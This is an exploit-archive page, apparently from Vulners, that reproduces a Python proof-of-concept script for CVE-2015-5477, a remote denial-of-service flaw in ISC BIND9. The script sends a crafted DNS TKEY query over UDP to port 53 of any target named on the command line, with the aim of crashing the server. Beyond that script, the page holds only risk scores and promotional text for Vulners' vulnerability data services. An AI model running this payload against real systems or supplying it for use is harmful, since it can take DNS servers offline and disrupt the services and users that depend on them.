Lucene search
K

ISC BIND9 TKEY Remote DoS PoC

🗓️ 05 Aug 2015 00:00:00Reported by elceefType 
zdt
 zdt
🔗 0day.today👁 118 Views

ISC BIND9 TKEY Remote DoS PoC, exploiting CVE-2015-5477 for denial of service attac

Related
Code
# Exploit Title: PoC for BIND9 TKEY DoS
# Exploit Author: elceef
# Software Link: https://github.com/elceef/tkeypoc/
# Version: ISC BIND 9
# Tested on: multiple
# CVE : CVE-2015-5477
 
#!/usr/bin/env python
 
import socket
import sys
 
print('CVE-2015-5477 BIND9 TKEY PoC')
 
if len(sys.argv) < 2:
    print('Usage: ' + sys.argv[0] + ' [target]')
    sys.exit(1)
 
print('Sending packet to ' + sys.argv[1] + ' ...')
 
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex')) 
 
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
 
print('Done.')

#  0day.today [2018-03-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2015 00:00Current
7.8High risk
Vulners AI Score7.8
EPSS0.9267
118